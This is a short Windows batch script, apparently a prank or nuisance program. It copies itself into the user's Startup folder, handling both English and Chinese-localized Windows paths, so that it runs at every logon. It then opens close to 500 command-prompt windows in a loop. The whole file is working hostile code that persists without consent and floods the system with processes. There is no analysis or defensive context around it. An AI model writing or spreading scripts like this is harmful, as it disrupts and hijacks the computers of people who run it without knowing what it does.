@echo off
set /a count=0
if exist %WinDir%\HelpPane.exe copy /y "%0" "%userprofile%\AppData\Roaming
\Microsoft\Windows\Start Menu\Programs\Startup"
if not exist %WinDir%\HelpPane.exe copy /y "%0" "%userprofile%\「开始」菜单\程序\启
动"
:loop
set /a count=count+1
start cmd.exe
cls
if %count% geq 499 pause&exit
goto loop